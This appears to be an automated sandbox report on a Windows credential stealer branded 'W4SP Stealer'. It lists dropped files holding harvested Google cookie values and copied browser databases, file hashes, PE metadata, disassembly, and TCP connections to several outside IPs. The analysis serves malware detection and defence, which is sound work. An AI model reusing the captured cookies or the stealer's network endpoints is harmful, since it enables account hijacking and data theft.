Preview:	<--W4SP STEALER ON TOP-->....H057 K3Y: .google.com \| N4M3: CONSENT \| V41U3: PENDING+070..H057 K3Y: ogs.google.com \| N4M3: OTZ \| V41U3: 6639773_84_88_104280_84_446940..H057 K3Y: .google.com \| N4M3: __Secure-ENID \| V41U3: 6.SE=Md0Ynyf9ahpkx1CxTGF0vY434NJ6ymH-gDI2Tl5Ly-NQYGPjnNfggtiFRMAwx4JRDOC_gavEPcD5cTBJzUgtbJobmBEuJ8xi2UuotxvOZgApoqSIg1b0RP47U08XG8Bz_SExSzKy0ETSsajbToDlYyFsxfI93p7AyRAd-OeIBA0..

C:\Users\user\AppData\Local\Temp\wppassw.txt

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	ASCII text, with CRLF line terminators
Category:	dropped
Size (bytes):	29
Entropy (8bit):	3.9353986674667634
Encrypted:	false
SSDEEP:	3:v1PWgkpg1qreCS:FWhpg1qreCS
MD5:	CE49C0050F7F067FF769599925706543
SHA1:	A9D5EC8DA3F6274D60D4963746F345CA44716006
SHA-256:	16838507DB2CF241FB39AE1AC56A4A22855C76081471FE6905A705CF0E312445
SHA-512:	09BD14164EF64FDB6BBEB16BF435EDE2C809D1486B641A765B1900F734E8F73542A89E7BEC6E2094A08DB4AFC28C442AF98890828D4A95AFF34C5FF9C87E6488
Malicious:	false
Preview:	<--W4SP STEALER ON TOP-->....

C:\Users\user\AppData\Local\Tempwpcijtdnbz.db

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, page size 2048, file counter 2, database pages 23, cookie 0x19, schema 4, UTF-8, version-valid-for 2
Category:	dropped
Size (bytes):	49152
Entropy (8bit):	0.7876734657715041
Encrypted:	false
SSDEEP:	48:43KzOIIY3HzrkNSs8LKvUf9KnmlG0UX9q4lCm+KLka+yJqhM0ObVEq8Ma0D0HOlx:Sq0NFeymDlGD9qlm+KL2y0Obn8MouO
MD5:	CF7758A2FF4A94A5D589DEBAED38F82E
SHA1:	D3380E70D0CAEB9AD78D14DD970EA480E08232B8
SHA-256:	6CA783B84D01BFCF9AA7185D7857401D336BAD407A182345B97096E1F2502B7F
SHA-512:	1D0C49B02A159EEB4AA971980CCA02751973E249422A71A0587EE63986A4A0EB8929458BCC575A9898CE3497CC5BDFB7050DF33DF53F5C88D110F386A0804CBF
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

C:\Users\user\AppData\Local\Tempwpojxtbyjo.db

Download File

Process:	C:\Users\user\Desktop\4Vp6Xc8SFr.exe
File Type:	SQLite 3.x database, last written using SQLite version 3038005, file counter 11, database pages 7, 1st free page 5, free pages 2, cookie 0x13, schema 4, UTF-8, version-valid-for 11
Category:	dropped
Size (bytes):	28672
Entropy (8bit):	0.7175172839606828
Encrypted:	false
SSDEEP:	24:TL0PczkwubXYFpFNYcw+6UwcYzHr8CtNdByiWUmozjng15n2PyS3piyQxJEv:TUcYwuLopFgU1YzLHyKDALnMj5iyQ7Ev
MD5:	C1C5F78369A7D66A61D8A8AF47FFC00E
SHA1:	6BADA623EBCC06BE23C97CB069504290FFAC084A
SHA-256:	0528EC1BB5475617C4EA096113BB2D6B07B223945D60E81236FF1BBD72FC6D4F
SHA-512:	39A5BEFD0C5D444C603EE53885EC57709E86CE14E9444F6FB3C26D45B99DD1BB46BA84FE998E11343F30C19BA7F023DA22A16D4D5DB48FA7D57B3E417E9881DE
Malicious:	false
Preview:	SQLite format 3......@ ..........................................................................[5.........g...$......................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

Static File Info

General

File type:	PE32+ executable (GUI) x86-64, for MS Windows
Entropy (8bit):	7.993364938954266
TrID:	Win64 Executable GUI (202006/5) 92.65% Win64 Executable (generic) (12005/4) 5.51% Generic Win/DOS Executable (2004/3) 0.92% DOS Executable Generic (2002/1) 0.92% Autodesk FLIC Image File (extensions: flc, fli, cel) (7/3) 0.00%
File name:	4Vp6Xc8SFr.exe
File size:	9489558
MD5:	b91a84a6995cb793ef6417222281295b
SHA1:	e8f8bf0cd0c38c339ceaadf3efca77d10bc8d43e
SHA256:	37a78be75ce8c01a57b12f589aacda2e8dd8fcd861bb09e279528d4dd0a1de24
SHA512:	b045173b30854d4e07d0e385120c2cb16a5133d89755f49275168c5ab92a1213d2367470a93615b75c801f7f1e03a3514825037384048242f675d8f3a2f65916
SSDEEP:	196608:tALaAXYWyqXdQmRJ8dA6lXCy1ArqkVpKCX+PrF4Zb+FnFHeghkf5NmytGgpZ:WxYWySdQuslXrAZYCuPJOSFnVegQ5TGi
TLSH:	3AA63364235008EDEDA99437C969960ED3C0B812A754C27F8348577A2FA7BE17CB7F24
File Content Preview:	MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........-@.`~@.`~@.`~..c.G.`~..e...`~..d.J.`~...~D.`~..e.h.`~..d.Q.`~..c.I.`~..a.K.`~@.a~..`~..d.T.`~..b.A.`~Rich@.`~...............

File Icon


Icon Hash:	c6c2ccd6f2e0e0f8

Static PE Info

General

Entrypoint:	0x14000afd0
Entrypoint Section:	.text
Digitally signed:	false
Imagebase:	0x140000000
Subsystem:	windows gui
Image File Characteristics:	EXECUTABLE_IMAGE, LARGE_ADDRESS_AWARE
DLL Characteristics:	HIGH_ENTROPY_VA, DYNAMIC_BASE, NX_COMPAT, GUARD_CF, TERMINAL_SERVER_AWARE
Time Stamp:	0x6363BDBD [Thu Nov 3 13:10:21 2022 UTC]
TLS Callbacks:
CLR (.Net) Version:
OS Version Major:	5
OS Version Minor:	2
File Version Major:	5
File Version Minor:	2
Subsystem Version Major:	5
Subsystem Version Minor:	2
Import Hash:	a6cec5b1a631d592d80900ab7e1de8df

Entrypoint Preview

Instruction
dec eax
sub esp, 28h
call 00007F7D24D0CDFCh
dec eax
add esp, 28h
jmp 00007F7D24D0C76Fh
int3
int3
inc eax
push ebx
dec eax
sub esp, 20h
dec eax
mov ebx, ecx
xor ecx, ecx
call dword ptr [0001F1EBh]
dec eax
mov ecx, ebx
call dword ptr [0001F1DAh]
call dword ptr [0001F14Ch]
dec eax
mov ecx, eax
mov edx, C0000409h
dec eax
add esp, 20h
pop ebx
dec eax
jmp dword ptr [0001F1D0h]
int3
int3
int3
int3
int3
int3
int3
int3
dec eax
mov dword ptr [esp+08h], ecx
dec eax
sub esp, 38h
mov ecx, 00000017h
call dword ptr [0001F1BCh]
test eax, eax
je 00007F7D24D0C8F9h
mov ecx, 00000002h
int 29h
dec eax
lea ecx, dword ptr [0004104Ah]
call 00007F7D24D0CABEh
dec eax
mov eax, dword ptr [esp+38h]
dec eax
mov dword ptr [00041131h], eax
dec eax
lea eax, dword ptr [esp+38h]
dec eax
add eax, 08h
dec eax
mov dword ptr [000410C1h], eax
dec eax
mov eax, dword ptr [0004111Ah]
dec eax
mov dword ptr [00040F8Bh], eax
dec eax
mov eax, dword ptr [esp+40h]
dec eax
mov dword ptr [0004108Fh], eax
mov dword ptr [00040F65h], C0000409h
mov dword ptr [00040F5Fh], 00000001h
mov dword ptr [00000069h], 00000000h

Data Directories

Name	Virtual Address	Virtual Size	Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IMPORT	0x3bc94	0x78	.rdata
IMAGE_DIRECTORY_ENTRY_RESOURCE	0x52000	0xf498	.rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION	0x4e000	0x20c4	.pdata
IMAGE_DIRECTORY_ENTRY_SECURITY	0x0	0x0
IMAGE_DIRECTORY_ENTRY_BASERELOC	0x62000	0x758	.reloc
IMAGE_DIRECTORY_ENTRY_DEBUG	0x39420	0x1c	.rdata
IMAGE_DIRECTORY_ENTRY_COPYRIGHT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_GLOBALPTR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_TLS	0x0	0x0
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG	0x392e0	0x140	.rdata
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_IAT	0x2a000	0x418	.rdata
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT	0x0	0x0
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR	0x0	0x0
IMAGE_DIRECTORY_ENTRY_RESERVED	0x0	0x0

Sections

Name	Virtual Address	Virtual Size	Raw Size	Xored PE	ZLIB Complexity	File Type	Entropy	Characteristics
.text	0x1000	0x28750	0x28800	False	0.5581898630401234	data	6.485344870483634	IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rdata	0x2a000	0x12a9e	0x12c00	False	0.5158723958333333	data	5.81736271499062	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.data	0x3d000	0x103e8	0xe00	False	0.13197544642857142	data	1.8069121639354628	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
.pdata	0x4e000	0x20c4	0x2200	False	0.47702205882352944	data	5.328435194850881	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
_RDATA	0x51000	0x15c	0x200	False	0.38671875	data	2.758042162444589	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.rsrc	0x52000	0xf498	0xf600	False	0.8035759654471545	data	7.555572206814068	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc	0x62000	0x758	0x800	False	0.5390625	data	5.236213438241001	IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ

Resources

Name	RVA	Size	Type
RT_ICON	0x52208	0xea8	Device independent bitmap graphic, 48 x 96 x 8, image size 0
RT_ICON	0x530b0	0x8a8	Device independent bitmap graphic, 32 x 64 x 8, image size 0
RT_ICON	0x53958	0x568	Device independent bitmap graphic, 16 x 32 x 8, image size 0
RT_ICON	0x53ec0	0x952c	PNG image data, 256 x 256, 8-bit/color RGBA, non-interlaced
RT_ICON	0x5d3ec	0x25a8	Device independent bitmap graphic, 48 x 96 x 32, image size 0
RT_ICON	0x5f994	0x10a8	Device independent bitmap graphic, 32 x 64 x 32, image size 0
RT_ICON	0x60a3c	0x468	Device independent bitmap graphic, 16 x 32 x 32, image size 0
RT_GROUP_ICON	0x60ea4	0x68	data
RT_MANIFEST	0x60f0c	0x589	XML 1.0 document, ASCII text, with CRLF line terminators

Imports

DLL	Import
USER32.dll	CreateWindowExW, MessageBoxW, MessageBoxA, SystemParametersInfoW, DestroyIcon, SetWindowLongPtrW, GetWindowLongPtrW, GetClientRect, InvalidateRect, ReleaseDC, GetDC, DrawTextW, GetDialogBaseUnits, EndDialog, DialogBoxIndirectParamW, MoveWindow, SendMessageW
COMCTL32.dll
KERNEL32.dll	IsValidCodePage, GetStringTypeW, GetFileAttributesExW, HeapReAlloc, FlushFileBuffers, GetCurrentDirectoryW, GetACP, GetOEMCP, GetModuleHandleW, MulDiv, GetLastError, SetDllDirectoryW, GetModuleFileNameW, GetProcAddress, GetCommandLineW, GetEnvironmentVariableW, GetCPInfo, ExpandEnvironmentStringsW, CreateDirectoryW, GetTempPathW, WaitForSingleObject, Sleep, GetExitCodeProcess, CreateProcessW, GetStartupInfoW, FreeLibrary, LoadLibraryExW, SetConsoleCtrlHandler, FindClose, FindFirstFileExW, CloseHandle, GetCurrentProcess, LocalFree, FormatMessageW, MultiByteToWideChar, WideCharToMultiByte, GetEnvironmentStringsW, FreeEnvironmentStringsW, GetProcessHeap, GetTimeZoneInformation, HeapSize, WriteConsoleW, SetEndOfFile, SetEnvironmentVariableW, RtlUnwindEx, RtlCaptureContext, RtlLookupFunctionEntry, RtlVirtualUnwind, UnhandledExceptionFilter, SetUnhandledExceptionFilter, TerminateProcess, IsProcessorFeaturePresent, QueryPerformanceCounter, GetCurrentProcessId, GetCurrentThreadId, GetSystemTimeAsFileTime, InitializeSListHead, IsDebuggerPresent, SetLastError, EnterCriticalSection, LeaveCriticalSection, DeleteCriticalSection, InitializeCriticalSectionAndSpinCount, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, EncodePointer, RaiseException, RtlPcToFileHeader, GetCommandLineA, CreateFileW, GetDriveTypeW, GetFileInformationByHandle, GetFileType, PeekNamedPipe, SystemTimeToTzSpecificLocalTime, FileTimeToSystemTime, GetFullPathNameW, RemoveDirectoryW, FindNextFileW, SetStdHandle, DeleteFileW, ReadFile, GetStdHandle, WriteFile, ExitProcess, GetModuleHandleExW, HeapFree, GetConsoleMode, ReadConsoleW, SetFilePointerEx, GetConsoleOutputCP, GetFileSizeEx, HeapAlloc, FlsAlloc, FlsGetValue, FlsSetValue, FlsFree, CompareStringW, LCMapStringW
ADVAPI32.dll	OpenProcessToken, GetTokenInformation, ConvertStringSecurityDescriptorToSecurityDescriptorW, ConvertSidToStringSidW
GDI32.dll	SelectObject, DeleteObject, CreateFontIndirectW

Network Behavior

Network Port Distribution

TCP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP
Apr 4, 2023 09:04:12.489053965 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.489121914 CEST	443	49709	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:12.489247084 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.559032917 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.559077978 CEST	443	49709	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:12.561800003 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:12.561866999 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:12.561954975 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:12.563975096 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:12.564007044 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:12.691827059 CEST	443	49709	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:12.692953110 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.692998886 CEST	443	49709	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:12.695414066 CEST	443	49709	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:12.695538998 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.697240114 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.697283030 CEST	443	49709	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:12.697611094 CEST	49709	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:12.983678102 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.083007097 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.395515919 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.395559072 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.399347067 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.399466038 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.399549007 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.402158976 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.402195930 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.402415037 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.412544966 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.412581921 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.510838985 CEST	443	49710	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.511049986 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.522986889 CEST	49710	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.694964886 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.695039988 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.695127964 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.696151972 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:13.696190119 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:13.699567080 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.699640989 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.699733019 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.700737000 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.700807095 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.828955889 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.829478025 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.829530954 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.832104921 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.832351923 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.849148035 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.849200010 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.849315882 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.849329948 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.849503994 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.894893885 CEST	443	49712	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:13.895128012 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:13.896296978 CEST	49712	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:14.112565994 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.112629890 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.112718105 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.113353968 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.113378048 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.171963930 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.172750950 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.172785044 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.174092054 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.174252033 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.176095009 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.176119089 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.176261902 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.176405907 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.176414013 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.176516056 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.176527977 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.301991940 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.514619112 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.514786005 CEST	443	49713	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:14.514940977 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.515619040 CEST	49713	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:14.717417002 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:14.718163967 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:14.718205929 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:14.719696045 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:14.719867945 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:14.721103907 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:14.721132040 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:14.721257925 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:14.721298933 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:14.721312046 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:14.804634094 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:14.804670095 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:15.005208969 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:15.056000948 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:15.074357033 CEST	443	49711	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:15.074590921 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:15.076994896 CEST	49711	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:15.269525051 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.269581079 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.269685030 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.271042109 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.271073103 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.372721910 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.385514975 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.385561943 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.387191057 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.387351990 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.389925003 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.389956951 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.390150070 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.390161991 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.390199900 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.428586006 CEST	443	49714	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:15.428685904 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.429792881 CEST	49714	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:15.661880970 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.661973000 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.662086964 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.662880898 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.662925959 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.729927063 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.730626106 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.730684996 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.732784033 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.732934952 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.734738111 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.734776974 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.735029936 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.735061884 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.735078096 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.735213995 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.735235929 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.802063942 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.921618938 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.921819925 CEST	443	49715	46.4.105.116	192.168.2.6
Apr 4, 2023 09:04:15.921909094 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.922295094 CEST	49715	443	192.168.2.6	46.4.105.116
Apr 4, 2023 09:04:15.959929943 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:15.960015059 CEST	443	49716	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:15.960102081 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:15.981981993 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:15.982037067 CEST	443	49716	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:16.098026037 CEST	443	49716	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:16.098839045 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:16.098886967 CEST	443	49716	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:16.101398945 CEST	443	49716	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:16.101502895 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:16.102346897 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:16.102369070 CEST	443	49716	51.38.43.18	192.168.2.6
Apr 4, 2023 09:04:16.102534056 CEST	49716	443	192.168.2.6	51.38.43.18
Apr 4, 2023 09:04:16.858987093 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:16.859070063 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:16.859203100 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:16.860806942 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:16.860831976 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.273715019 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.274642944 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.274678946 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.276967049 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.277151108 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.279071093 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.279103041 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.279424906 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.280878067 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.280904055 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.486723900 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.487545967 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.508636951 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.508810043 CEST	443	49717	64.185.227.155	192.168.2.6
Apr 4, 2023 09:04:17.509064913 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.509777069 CEST	49717	443	192.168.2.6	64.185.227.155
Apr 4, 2023 09:04:17.733422995 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.733489990 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.733659983 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.734579086 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.734594107 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.850465059 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.851336002 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.851366043 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.853692055 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.854238033 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.855895996 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.855926991 CEST	443	49718	159.89.102.253	192.168.2.6
Apr 4, 2023 09:04:17.856148005 CEST	49718	443	192.168.2.6	159.89.102.253
Apr 4, 2023 09:04:17.856157064 CEST	443	49718	159.89.102.253	192.168.2.6
